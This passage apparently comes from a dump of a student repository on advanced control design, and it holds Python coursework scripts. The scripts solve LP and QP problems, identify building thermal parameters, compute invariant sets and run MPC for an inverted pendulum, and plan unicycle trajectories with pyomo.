v_trend.append(v)\n\n # return np.asarray(xtrend),np.asarray(ytrend),np.asarray(psi_trend),np.asarray(v_trend)\n return xtrend,ytrend,psi_trend,v_trend\n# call the function \nx,y,psi,v = 0,0,0,0\n# x0 = np.array([x,y,psi,v])\nx0 = [x,y,psi,v]\nxtrend,ytrend,psi_trend,v_trend = sim(time,a,beta,x0)\n\n# %% plot \n\nif False:\n N_plot = 200\n plt.subplot(411)\n plt.plot(time,xtrend)\n plt.ylabel('x')\n plt.subplot(412)\n plt.plot(time,ytrend)\n plt.ylabel('y')\n\n plt.subplot(413)\n plt.plot(time,psi_trend)\n plt.ylabel('psi')\n plt.subplot(414)\n plt.plot(time,v_trend)\n plt.ylabel('speed')\n\n # plt.show()\n\n plt.plot(xtrend,ytrend)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('Path of Car')\n # plt.show()\n\n\n"
},
{
"alpha_fraction": 0.5421215891838074,
"alphanum_fraction": 0.592306911945343,
"avg_line_length": 31.842105865478516,
"blob_id": "700384bbb45017c622667ff1603c07b816066655",
"content_id": "7ef0db236e498c57136f989e832606dec23b5111",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9983,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 304,
"path": "/py_files/HW2_optimization1.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport scipy as cp \nfrom scipy.optimize import linprog\n\nimport cvxopt\n\nf = np.ones((3,)) # 1D array\nA = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, -1], [-1, 1, -1]]) # 2D array\nb = np.array([-2,1,3,-4]) # 1D array\n# default bound is (0, None), so here we need to specify bound as (None, None), \n# since all the bounds all already considered in the inequality constraints \nopt1 = cp.optimize.linprog(c=f, A_ub=A, b_ub=b, bounds=(None, None), method='simplex')\n# print('x*=', opt1.x)\n# print('J*=', opt1.fun)\n\n# %% qp problems \nn = 4 # dimenstion of x\nA = np.array([[-0.54, -1.81, 0.25, -0.46],\n [-0.38, 0.37, -2.48, -0.68],\n [-1.31, 0.74, -1.57, 0.28],\n [-0.31, -0.02, 0.75, 0.20]])\nb = np.array([ 0.40, -2.45, -0.23, 0.98])\nl_i = -0.5 \nu_i = 0.5\n\nP = 2 * A.T @A \nq = -2 * A.T @b\nG = np.concatenate([np.eye(4), -np.eye(4)],axis= 0)\nh = np.concatenate([np.ones((n,1))*u_i,np.ones((n,1))*-l_i],axis=0)\n\nP = cvxopt.matrix(P,tc = 'd')\nq = cvxopt.matrix(q,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\nsol = cvxopt.solvers.qp(P,q,G,h)\n# print('x*=', sol['x'])\n# print('p*=', sol['primal objective'] + b.T @b)\n# ----------pay attention to b.T @b here -----------\n\nxstar = (np.linalg.inv((A.T @ A))) @ (A.T.dot(b)) # Analytical solution of unconstrained least-squares \nxstar[xstar > u_i] = u_i # projection: set any entries that are greater than 0.5 to 0.5\nxstar[xstar < l_i] = l_i # projection: set any entries that are less than -0.5 to -0.5\n\n# Compare performance (i.e. cost function)\n# print('x_analytical:', xstar) # analytical solution with projection \n# print('x_cvxopt:', sol['x']) # direct solution from cvxopt\n# print(np.linalg.norm(A @ np.reshape(sol['x'],(4,)) - b))\n# print(np.linalg.norm(A @ xstar - b))\n\n# %% Problem2 \nfrom scipy.io import loadmat \n\nData = loadmat('Data/etch2169.mat')\nRoomTempData = Data['RoomTempData']\nFanData = Data['FanData']\nSupplyTempData = Data['SupplyTempData']\n\n\nfrom datetime import date\nfrom datetime import datetime as dt\n\n# datenum is a function which converts date stings and date vectors into serial date numbers.\n# Date numbers are serial days elapsed from some reference time. \n\ndef datenum(d):\n return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\nd_start = dt.strptime('2018-9-9 10:1','%Y-%m-%d %H:%M')\nd_end = dt.strptime('2018-9-9 15:59','%Y-%m-%d %H:%M')\nd_start_plus_onemin = dt.strptime('2018-9-9 10:2','%Y-%m-%d %H:%M')\n\nTS = datenum(d_start_plus_onemin) - datenum(d_start)\nTimeQuery = np.arange(start=datenum(d_start), stop=datenum(d_end), step=TS)\n\nimport matplotlib.pyplot as plt \nif False:\n counts, bins = np.histogram(np.diff(RoomTempData[:,0]))\n plt.hist(bins[:-1],bins,weights=counts)\n # plt.show()\n\nfrom scipy import interpolate\n\nxData = np.cumsum(np.hstack([np.zeros((1,)), 0.1+np.random.rand(19,)]))\nyTmp = np.hstack([np.sort(3*np.random.rand(10,1)), np.fliplr(np.sort(3*np.random.rand(10,1)))])\nyData = yTmp.flatten()\nxQuery = np.arange(start=0.1, stop=np.max(xData), step=0.2)\n\nf_interp = interpolate.interp1d(xData, yData, 'linear')\nyInterpLinear = f_interp(xQuery)\n\nf_spline = interpolate.UnivariateSpline(xData, yData)\nyInterpSpline = f_spline(xQuery)\n\nif False:\n plt.subplot(2,1,1)\n plt.plot(xData, yData, 'k*', xQuery, yInterpLinear, '-or')\n plt.legend(['Data Points', 'Linear Interpolated Values'])\n plt.ylabel('y')\n plt.subplot(2,1,2)\n plt.plot(xData, yData, 'k*', xQuery, yInterpSpline, '-or')\n plt.legend(['Data Points', 'Spline Interpolated Values'])\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\ntime_T = RoomTempData[:,0]\ntime_u1 = FanData[:,0]\ntime_u2 = SupplyTempData[:,0]\n\ndata_T =RoomTempData[:,1]\ndata_u1 = FanData[:,1]\ndata_u2 = SupplyTempData[:,1]\n\n# spline interpolate \nfun_T= interpolate.UnivariateSpline(time_T,data_T)\nspline_T = fun_T(TimeQuery)\n\nfun_u1 = interpolate.UnivariateSpline(time_u1,data_u1)\nspline_u1 = fun_u1(TimeQuery)\n\nfun_u2 = interpolate.UnivariateSpline(time_u2,data_u2)\nspline_u2 = fun_u2(TimeQuery)\n\nif False:\n plt.plot(TimeQuery,spline_T,'-or')\n plt.plot(time_T,data_T)\n plt.show()\n\nN = 360 \ndef bldgIdentification(Tdata,u1Seq,u2Seq):\n b = -np.diff(Tdata)\n # a2 = - u1Seq @ u2Seq\n # a1 = u1Seq @ Tdata[0:-1]\n a2 = -np.multiply(u1Seq,u2Seq)\n a1 = np.multiply(u1Seq,Tdata[0:-1])\n# --------can only use multiply here ------------\n A = np.concatenate([np.reshape(a1,(len(a1),1)),np.reshape(a2,(len(a2),1))],axis= 1)\n P = 2 * A.T @ A \n q = -2 * A.T @b\n P = cvxopt.matrix(P,tc='d')\n q = cvxopt.matrix(q,tc='d')\n sol = cvxopt.solvers.qp(P,q)\n estParm = sol['x']\n return estParm\n\nTdata = RoomTempData[:,1]\nu1Seq = FanData[0:-1,1]\nu2Seq = SupplyTempData[0:-1,1]\n# print(bldgIdentification(Tdata,u1Seq,u2Seq))\n\n# %% P4\n\ndef buildLinClass(G1,G2):\n nf, p1 = np.shape(G1)\n _, p2 = np.shape(G2)\n P = p1+p2\n \n # c matrix for cost function: c* (c1,c2,b,v1,,,vP).T \n c = np.concatenate([np.zeros(nf+1),np.ones(P)],axis= 0)\n\n # A matrix for 3 constraints : tk >=0, c.T * vk + tk >=1; c.T * vk + b -tk <= -1\n\n A = np.concatenate(\n [\n np.concatenate([np.zeros((P,nf+1)),-np.eye(P)],axis= 1),\n np.concatenate([-G1.T,-np.ones((p1,1)),-np.eye(p1),np.zeros((p1,p2))],axis=1),\n np.concatenate([G2.T,np.ones((p2,1)),np.eye(p2),np.zeros((p2,p1))],axis=1)\n ],axis= 0\n )\n b = np.concatenate(\n [np.zeros((P,1)),-np.ones((p1,1)),-np.ones((p2,1))],\n axis= 0\n )\n\n c = cvxopt.matrix(c,tc = 'd')\n A = cvxopt.matrix(A,tc = 'd')\n b = cvxopt.matrix(b,tc = 'd')\n\n sol = cvxopt.solvers.lp(c,A,b)\n xOpt = sol['x']\n c = np.array(xOpt[:nf]).flatten()\n b = np.array(xOpt[nf]).flatten()\n t = np.array(xOpt[nf+1:]).flatten()\n\n return c,b,t\n\nnF = 2\nnP = 100\ncTrue = np.random.randn(nF,1)\nbTrue = np.random.randn(1,1)\nPop = np.random.randn(nF, nP) \n\nLPop = cTrue.T@Pop + bTrue\nidx_pos = np.argwhere(LPop>0)\nidx_neg = np.argwhere(LPop<0)\n\nG1 = Pop[:, idx_pos[:,1]] # create the populations based on their L-value\nG2 = Pop[:, idx_neg[:,1]] # create the populations based on their L-value\n\n[cEst, bEst, tAdjust] = buildLinClass(G1,G2)\n\nmax(abs(tAdjust)) # should be 0 (or very close)\nf1Min = np.min(Pop[0,:]) # minimum age\nf1Max = np.max(Pop[0,:]) # maximum age\nf2Min = np.min(Pop[1,:]) # minimum number of movies\nf2Max = np.max(Pop[1,:]) # maximum number of movies\n\nif False:\n plt.plot(np.array([f1Min-1, f1Max+1]), -(cEst[0]*np.array([f1Min-1, f1Max+1])+bEst)/cEst[1],'b')\n plt.plot(G1[0,:],G1[1,:],'b*')\n plt.plot(G2[0,:],G2[1,:],'ro')\n plt.xlim([f1Min-0.1, f1Max+0.1])\n plt.ylim([f2Min-0.1, f2Max+0.1])\n plt.axis('equal') \n plt.show()\n\nif False:\n nF = 2\n nP = 100\n nOut = np.int(0.1*nP)\n cTrue = np.random.randn(nF,1)\n bTrue = np.random.randn(1,1)\n Pop = np.random.randn(nF, nP)\n Noise = np.asarray([np.random.randn(1) if i < nOut else 0.0 for i in range(nP)], dtype=object)\n\n LPop = cTrue.T@Pop + bTrue + Noise #corrupt some L-values with noise\n idx_pos = np.argwhere(LPop>0)\n idx_neg = np.argwhere(LPop<0)\n\n G1 = Pop[:, idx_pos[:,1]] # create the populations based on their L-value\n G2 = Pop[:, idx_neg[:,1]] # create the populations based on their L-value\n\n [cEst, bEst, tAdjust] = buildLinClass(G1,G2)\n\n max(abs(tAdjust)) # likely nonzero, and > 1, dealing wiht non-separability \n f1Min = min(Pop[0,:]) # minimum age\n f1Max = max(Pop[0,:]) # maximum age\n f2Min = min(Pop[1,:]) # minimum number of movies\n f2Max = max(Pop[1,:]) # maximum number of movies\n\n plt.plot(np.array([f1Min-1, f1Max+1]), -(cEst[0]*np.array([f1Min-1, f1Max+1])+bEst)/cEst[1],'b')\n plt.plot(G1[0,:],G1[1,:],'b*')\n plt.plot(G2[0,:],G2[1,:],'ro')\n plt.xlim([f1Min-0.1, f1Max+0.1])\n plt.ylim([f2Min-0.1, f2Max+0.1])\n plt.axis('equal')\n plt.show()\n\n# P8 \n# test = np.arange(12).reshape((2,6))\n# print(np.size(test,1))\n\ndef reg1Inf(A1,b1,Ainf,binf,Ac,bc):\n # the question transformed to:\n # min(z1,z2,,zn,t1,t2,,t_nc,t_inf){t1,t2,,t_nc,t_inf}\n # t1,t2,,t_nc = |A1 *z -b1|\n # t_inf = max(|A_inf *z - b_inf|)\n\n n_1, nx = np.shape(A1)\n n_inf, _ = np.shape(Ainf)\n nc, _ = np.shape(Ac)\n\n c = np.concatenate(\n [\n # np.zeros(np.size(Ac,1)),np.ones(np.size(A1,0)),np.array((1,))\n np.zeros(nx),np.ones(n_1),np.array((1,))\n ],axis= 0\n )\n A = np.concatenate(\n [\n # np.concatenate([A1,-np.eye(np.size(A1,0)),np.zeros((np.size(A1,0),1))],axis=1),\n # np.concatenate([-A1,-np.eye(np.size(A1,0)),np.zeros((np.size(A1,0),1))],axis=1),\n # np.concatenate([Ainf,np.zeros((np.size(Ainf,1),np.size(A1,1))),np.ones((np.size(Ainf,0),1))],axis= 1),\n # np.concatenate([-Ainf,np.zeros((np.size(Ainf,1),np.size(A1,1))),-np.ones((np.size(Ainf,0),1))],axis= 1),\n # np.concatenate([Ac,np.zeros((np.size(Ac,0),np.size(A1,0))),np.zeros((np.size(Ac,0),1))],axis=1)\n np.concatenate([A1,-np.eye(n_1),np.zeros((n_1,1))],axis=1),\n np.concatenate([-A1,-np.eye(n_1),np.zeros((n_1,1))],axis=1),\n np.concatenate([Ainf,np.zeros((n_inf,nx)),np.ones((n_inf,1))],axis= 1),\n np.concatenate([-Ainf,np.zeros((n_inf,nx)),-np.ones((n_inf,1))],axis= 1),\n np.concatenate([Ac,np.zeros((nc,n_1)),np.zeros((nc,1))],axis=1)\n\n ],axis = 0\n )\n b = np.concatenate([b1,-b1,binf,-binf,bc],axis=0)\n\n c = cvxopt.matrix(c,tc='d')\n A = cvxopt.matrix(A,tc='d')\n b = cvxopt.matrix(b,tc='d')\n\n\n sol = cvxopt.solvers.lp(c,A,b)\n xOpt = sol['x']\n J = sol['primal objective']\n return xOpt,J \n\na1 = np.zeros((3,3))\nb1 = np.array([0,0,0]).reshape((3,1))\nainf = np.array([[2,0,-1],[1,-1,0]])\nbinf = np.array([1,2]).reshape((2,1))\nac = np.array([[1,-1,1],[-1,-1,0]])\nbc = np.array([-1,-1]).reshape((2,1))\nxOpt, J = reg1Inf(a1,b1,ainf,binf,ac,bc)\nprint('xOpt: ',xOpt)\nprint('J* = ',J)"
},
{
"alpha_fraction": 0.5498955249786377,
"alphanum_fraction": 0.5703909993171692,
"avg_line_length": 28.827892303466797,
"blob_id": "d711316308d6bd168c770b41a387e488cf228ba6",
"content_id": "df1dc97057fdf7da15f99a4e5d6c0ba9bceee7b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10051,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 337,
"path": "/py_files/lab10_mpc_reachability.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# %%\n# Lab 10: Reachability Analysis for Constrained Inverted Pendulum Model (Solution) \n\n# x1 is the angle of the pendulum, \n# x2 is the angular velocity of the pendulum, and \n# u is the speed of the cart.\n\n# %%\nimport numpy as np\nimport scipy.signal\nimport scipy.linalg\nfrom scipy.integrate import solve_ivp\nimport matplotlib.pyplot as plt\nimport polytope as pt\n\nTs = 0.1 # Ts is the discrete sample-time. \n\nAc = np.array([[0, 1],\n [2.5, -0.05]])\nBc = np.array([[0],\n [2.5]])\nCc = np.zeros((1,2))\nDc = np.zeros((1,1))\nsystem = (Ac, Bc, Cc, Dc)\nA, B, C, D, dt = scipy.signal.cont2discrete(system, Ts)\n\nnx = np.size(A,0) # number of states\nnu = np.size(B,1) # number of inputs\n\nQ = np.eye(2)\nR = np.array([1])\n\nuU = np.pi/10\nuX1 = np.pi/4\nuX2 = np.pi/2\n\ndef dlqr(A, B, Q, R):\n # solve Discrete Algebraic Riccatti equation \n P = scipy.linalg.solve_discrete_are(A, B, Q, R)\n\n # compute the LQR gain\n K = scipy.linalg.inv(B.T @ P @ B + R) @ (B.T @ P @ A)\n\n # stability check \n eigVals, eigVecs = scipy.linalg.eig(A - B @ K)\n return K, P\n\nFinf, Pinf = dlqr(A, B, Q, R)\n\nAcl = A - B @ Finf\n\n# %% \n# Polytope tools \nx1U = np.pi/4\nx2U = np.pi/2\nuU = np.pi/10\n\n# constraint sets represented as polyhedra\n# state constraint\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[x1U], \n [x2U],\n [x1U],\n [x2U]])) \nU = pt.Polytope(np.array([1, -1]).reshape(2,1),\n np.array([uU, uU]).reshape(2,1))\n\n\n# Helper Function:\n\ndef minkowski_sum(X, Y):\n\n # Minkowski sum between two polytopes based on \n # vertex enumeration. So, it's not fast for the\n # high dimensional polytopes with lots of vertices.\n V_sum = []\n if isinstance(X, pt.Polytope):\n V1 = pt.extreme(X)\n else:\n # assuming vertices are in (N x d) shape. N # of vertices, d dimension\n V1 = X\n \n if isinstance(Y, pt.Polytope):\n V2 = pt.extreme(Y)\n else:\n V2 = Y\n\n for i in range(V1.shape[0]):\n for j in range(V2.shape[0]):\n V_sum.append(V1[i,:] + V2[j,:])\n return pt.qhull(np.asarray(V_sum))\n\n# %% positive invariant set \ndef precursor(Xset, A, Uset=pt.Polytope(), B=np.array([])):\n if not B.any():\n return pt.Polytope(Xset.A @ A, Xset.b)\n else:\n tmp = minkowski_sum( Xset, pt.extreme(Uset) @ -B.T )\n return pt.Polytope(tmp.A @ A, tmp.b)\n\ndef Oinf(A, Xset):\n \n Omega = Xset\n k = 0\n Omegap = precursor(Omega, A).intersect(Omega)\n while not Omegap == Omega:\n k += 1\n Omega = Omegap\n Omegap = pt.reduce(precursor(Omega, A).intersect(Omega))\n return Omegap\n\n# remeber to convet input constraits in state constraints\nS = X.intersect(pt.Polytope(U.A @ -Finf, U.b))\n# maximal positive invariant set \n\nO_inf = Oinf(Acl, S) \n\n# %% maximal control invariant set \ndef Cinf(A, B, Xset, Uset):\n \n Omega = Xset\n k = 0\n Omegap = precursor(Omega, A, Uset, B).intersect(Omega)\n while not Omegap == Omega:\n k += 1\n Omega = Omegap\n Omegap = precursor(Omega, A, Uset, B).intersect(Omega)\n return Omegap\nC_inf = Cinf(A, B, X, U)\n\n# %% initial feasible set \n\nN = 3\n\nC = {}\nPreS = precursor(O_inf, A, U, B)\nfor j in range(N):\n C[j]= PreS.intersect(X)\n PreS = precursor(C[j], A, U, B)\n\nX0 = C[N-1] \n# The initial feasible set X0 is equivalent to the N-step controllable set. \n\n# %% plot \n# Plotting and Comparison\nplt.clf()\nplt.cla()\nplt.close('all')\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\nX.plot(ax, color='m', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # state constraint set\nC_inf.plot(ax, color='m', alpha=0.6, linestyle='solid', linewidth=1) # maximal control invariant set \nX0.plot(ax, color='y', alpha=0.7, linestyle='solid', linewidth=1) # initial feasible set \nO_inf.plot(ax, color='g', alpha=0.7, linestyle='solid', linewidth=1) # maximal positive invariant set \nax.legend(['X', 'Cinf', 'X0', 'Oinf'])\n\nax.autoscale_view()\n# ax.axis('equal')\nplt.show()\n\n# %%\n# simulation with MPC \n\nimport pyomo.environ as pyo\n\nXf = O_inf\nAf = Xf.A\nbf = Xf.b\n\nQ = np.eye(2)\nR = np.array([1]).reshape(1,1)\nP = Pinf # play here with different P\nN = 3\nx1U = np.pi/4\nx2U = np.pi/2\nuU = np.pi/10\nx0 = np.array([-0.5, 1])\n\ndef solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, bf, Af):\n \n model = pyo.ConcreteModel()\n model.N = N\n model.nx = np.size(A, 0)\n model.nu = np.size(B, 1)\n model.nf = np.size(Af, 0)\n \n # length of finite optimization problem:\n model.tIDX = pyo.Set( initialize= range(model.N+1), ordered=True ) \n model.xIDX = pyo.Set( initialize= range(model.nx), ordered=True )\n model.uIDX = pyo.Set( initialize= range(model.nu), ordered=True )\n \n model.nfIDX = pyo.Set( initialize= range(model.nf), ordered=True )\n \n # these are 2d arrays:\n model.A = A\n model.B = B\n model.Q = Q\n model.P = P\n model.R = R\n model.Af = Af\n model.bf = bf\n \n # Create state and input variables trajectory:\n model.x = pyo.Var(model.xIDX, model.tIDX)\n model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n \n #Objective:\n def objective_rule(model):\n costX = 0.0\n costU = 0.0\n costTerminal = 0.0\n for t in model.tIDX:\n for i in model.xIDX:\n for j in model.xIDX:\n if t < model.N:\n costX += model.x[i, t] * model.Q[i, j] * model.x[j, t] \n for t in model.tIDX:\n for i in model.uIDX:\n for j in model.uIDX:\n if t < model.N:\n costU += model.u[i, t] * model.R[i, j] * model.u[j, t]\n for i in model.xIDX:\n for j in model.xIDX: \n costTerminal += model.x[i, model.N] * model.P[i, j] * model.x[j, model.N]\n return costX + costU + costTerminal\n \n model.cost = pyo.Objective(rule = objective_rule, sense = pyo.minimize)\n \n # Constraints:\n def equality_const_rule(model, i, t):\n return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n \n\n model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U\n if t < N else pyo.Constraint.Skip)\n model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U\n if t < N else pyo.Constraint.Skip)\n model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n if t < N else pyo.Constraint.Skip)\n \n def final_const_rule(model, i):\n return sum(model.Af[i, j] * model.x[j, model.N] for j in model.xIDX) <= model.bf[i] \n \n model.final_const = pyo.Constraint(model.nfIDX, rule=final_const_rule)\n \n solver = pyo.SolverFactory('ipopt')\n results = solver.solve(model)\n \n if str(results.solver.termination_condition) == \"optimal\":\n feas = True\n else:\n feas = False\n \n xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n uOpt = np.asarray([model.u[:,t]() for t in model.tIDX]).T\n \n JOpt = model.cost()\n \n return [model, feas, xOpt, uOpt, JOpt]\n\n[model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, -uU, uU, bf, Af)\n\n# Setup the simulation with MPC controller\n\nnx = np.size(A, 0)\nnu = np.size(B, 1)\n\nM = 25 # Simulation steps\nxOpt = np.zeros((nx, M+1))\nuOpt = np.zeros((nu, M))\nxOpt[:, 0] = x0.reshape(nx, )\n\nxPred = np.zeros((nx, N+1, M))\npredErr = np.zeros((nx, M-N+1))\n\nfeas = np.zeros((M, ), dtype=bool)\nxN = np.zeros((nx,1))\n\nfig = plt.figure(figsize=(9, 6))\nfor t in range(M):\n [model, feas[t], x, u, J] = solve_cftoc(A, B, P, Q, R, N, xOpt[:, t], x1U, x2U, -uU, uU, bf, Af)\n \n if not feas[t]:\n xOpt = []\n uOpt = []\n predErr = []\n break\n # Save open loop predictions\n xPred[:, :, t] = x\n\n # Save closed loop trajectory\n # Note that the second column of x represents the optimal closed loop state\n xOpt[:, t+1] = x[:, 1]\n uOpt[:, t] = u[:, 0].reshape(nu, )\n\n # Plot Open Loop\n line1 = plt.plot(x[0,:], x[1,:], 'r--')\n\n# Plot Closed Loop\nline2 = plt.plot(xOpt[0, :], xOpt[1, :], 'bo-')\nplt.legend([line1[0], line2[0]], ['Open-loop', 'Closed-loop']);\nplt.xlabel('x1')\nplt.ylabel('x2')\nplt.axis('equal')\nplt.show()\n\n# Plotting the polytopic sets and the closed loop trajectory \nplt.clf()\nplt.cla()\nplt.close('all')\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\nX.plot(ax, color='m', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # state constraint set\nC_inf.plot(ax, color='m', alpha=0.6, linestyle='solid', linewidth=1) # maximal control invariant set \nX0.plot(ax, color='y', alpha=0.7, linestyle='solid', linewidth=1) # initial feasible set \nO_inf.plot(ax, color='g', alpha=0.7, linestyle='solid', linewidth=1) # maximal positive invariant set \nax.legend(['X', 'Cinf', 'X0', 'Oinf'])\n\nax.plot(xOpt[0, :], xOpt[1, :], 'bo-', markerfacecolor='none', markeredgewidth=0.5, linewidth= 0.5, label='traj') # closed loop trajectory \nax.plot(xOpt[0, 0], xOpt[1, 0], 'ro', label='init') # the initial condition x0\n\nax.autoscale_view()\n# ax.axis('equal')\nplt.show()"
},
{
"alpha_fraction": 0.5615951418876648,
"alphanum_fraction": 0.5996952056884766,
"avg_line_length": 23.30864143371582,
"blob_id": "b3a949c37ce1da481c3f26ec2a15063ef27f6593",
"content_id": "89de963d350eab1717bc348ff0e82a9af8d1a679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3937,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 162,
"path": "/py_files/unicycle.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# optimal control of a unicycle with pyomo\n\nimport matplotlib.pyplot as plt \nimport numpy as np \n \nfrom pyomo.dae import *\nfrom pyomo.environ import *\n\nTs = .05\nN = 50 \nTFinal = Ts*N\nNx = 3 \nNu = 2 \n\n# x' = vcos(theta); y' = vsin(theta), theta' = w\n# u = [v,w]\n\nimport pyomo.environ as pyo \n\nmodel = pyo.ConcreteModel()\nmodel.tidx = pyo.Set(initialize = range(N+1))\nmodel.xidx = pyo.Set(initialize = range(Nx))\nmodel.uidx = pyo.Set(initialize = range(Nu))\n\nmodel.z = pyo.Var(model.xidx, model.tidx)\nmodel.u = pyo.Var(model.uidx, model.tidx)\n\n# the objective can be different \nmodel.obj = pyo.Objective(\n expr = sum(model.u[0,t] **2 for t in model.tidx if t <N),\n sense = pyo.minimize\n)\n\nUdotLim = .03 \nz0 = [0,0,0]\nzf = [1,1,np.pi/4]\n\nmodel.cons1 = pyo.Constraint(\n model.xidx, rule = lambda model,i:\n model.z[i,0] == z0[i]\n)\nmodel.cons2 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.z[0,t+1] == model.z[0,t] + Ts *(pyo.cos(model.z[2,t])* model.u[0,t]) if t < N else pyo.Constraint.Skip\n)\nmodel.cons3 = pyo.Constraint(\n model.tidx, rule =lambda model,t:\n model.z[1,t+1] == model.z[1,t] + Ts* (pyo.sin(model.z[2,t])* model.u[0,t]) if t < N else pyo.Constraint.Skip \n)\nmodel.cons4 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.z[2,t+1] == model.z[2,t] + Ts * model.u[1,t]\n if t<N else pyo.Constraint.Skip\n)\n\nmodel.cons5 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[0,t] <=1 \n if t<N-1 else pyo.Constraint.Skip\n)\n# pay attention to N-1 here ----------------\nmodel.cons6 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[0,t] >= -1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons7 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[1,t] <= 1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons8 = pyo.Constraint(\n model.tidx, rule = lambda model,t: \n model.u[1,t] >= -1 \n if t<N-1 else pyo.Constraint.Skip\n)\nmodel.cons9 = pyo.Constraint(\n model.xidx, rule = lambda model,i: \n model.z[i,N] == zf[i]\n)\nresults = pyo.SolverFactory('ipopt').solve(model).write()\n\nz1 = [model.z[0,0]()]\nz2 = [model.z[1,0]()]\nz3 = [model.z[2,0]()]\nu1 = [model.u[0,0]()]\nu2 = [model.u[1,0]()]\n\nfor t in model.tidx:\n if t<N:\n z1.append(model.z[0,t+1]())\n z2.append(model.z[1,t+1]())\n z3.append(model.z[2,t+1]())\n if t<N-1:\n u1.append(model.u[0,t+1]())\n u2.append(model.u[1,t+1]())\n\nplt.figure(1)\nplt.plot(z1,z2,'b')\n# plt.show()\n\nm = pyo.ConcreteModel()\nm.tf = pyo.Param(initialize = TFinal)\nm.t = ContinuousSet(bounds = (0,m.tf))\nm.u1 = Var(m.t, initialize = 0)\nm.u2 = Var(m.t, initialize = 0)\nm.z1 = Var(m.t)\nm.z2 = Var(m.t)\nm.z3 = Var(m.t)\nm.dz1dt = DerivativeVar(m.z1, wrt=m.t)\nm.dz2dt = DerivativeVar(m.z2, wrt=m.t)\nm.dz3dt = DerivativeVar(m.z3, wrt=m.t)\n\nm.z1dot = Constraint(\n m.t, rule = lambda m,t:\n m.dz1dt[t] == pyo.cos(m.z3[t]) * m.u1[t]\n)\nm.z2dot = Constraint(\n m.t, rule = lambda m,t:\n m.dz2dt[t] == pyo.sin(m.z3[t]) * m.u1[t]\n)\nm.z3dot= Constraint(\n m.t, rule = lambda m,t:\n m.dz3dt[t] == m.u2[t]\n)\nm.cons1 = Constraint(\n m.t, rule = lambda m,t:\n m.u1[t] <= 1 \n)\nm.cons2 = Constraint(\n m.t, rule = lambda m,t:\n m.u1[t] >= -1 \n)\nm.cons3 = Constraint(\n m.t, rule = lambda m,t:\n m.u2[t] <= 1 \n)\nm.cons4 = Constraint(\n m.t, rule = lambda m,t:\n m.u2[t] >= -1 \n)\ndef _init(m):\n yield m.z1[0] == z0[0]\n yield m.z2[0] == z0[1]\n yield m.z3[0] == z0[2]\nm.init_conditions = ConstraintList(rule=_init)\n\ndef _end(m):\n yield m.z1[m.tf] == zf[0]\n yield m.z2[m.tf] == zf[1]\n yield m.z3[m.tf] == zf[2]\nm.end_conditions = ConstraintList(rule=_end)\n\nTransformationFactory('dae.finite_difference').apply_to(m, wrt=m.t, nfe=30)\n# Solve algebraic model\nresults = SolverFactory('ipopt').solve(m)\n\n\nplt.figure(1)\nplt.title('trajectory')\nplt.plot([value(m.z1[t]) for t in m.t], [value(m.z2[t]) for t in m.t],'o')\nplt.show()"
},
{
"alpha_fraction": 0.7453415989875793,
"alphanum_fraction": 0.7639751434326172,
"avg_line_length": 19.125,
"blob_id": "fbb64300e11ce8d8845f59b4783074773e74e09a",
"content_id": "f22340ae995000f9edeeb2fef8e13d0252265e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/README.md",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
